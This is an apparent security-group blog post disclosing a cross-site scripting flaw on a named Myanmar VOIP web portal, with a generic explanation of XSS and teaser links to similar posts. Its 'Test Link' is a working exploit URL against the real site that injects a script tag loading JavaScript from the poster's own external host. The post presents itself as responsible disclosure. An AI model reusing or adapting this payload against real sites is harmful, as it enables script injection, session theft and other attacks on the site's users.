Yatanarpon
Yatanarpon

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

XSS
XSS

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

Critical SQL Injection in Red Link

PlanetCreator has reported another critical SQL Injection (vulnerability) on Red Link http://www.redlink.net.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of

Read More

Extensive SQL Injection Tutorial

( This is one of the most extensive and most usefull tutorials about this subject I’ve seen read this and you’ll be sure to get a beter understanding! ) TABLE

Read More

How does the form-based authentication scheme work?

The form-based authentication scheme works in the following manner: * A client generates a request for a protected resource (e.g. a transaction details page). * The Internet Information Server (IIS)

Read More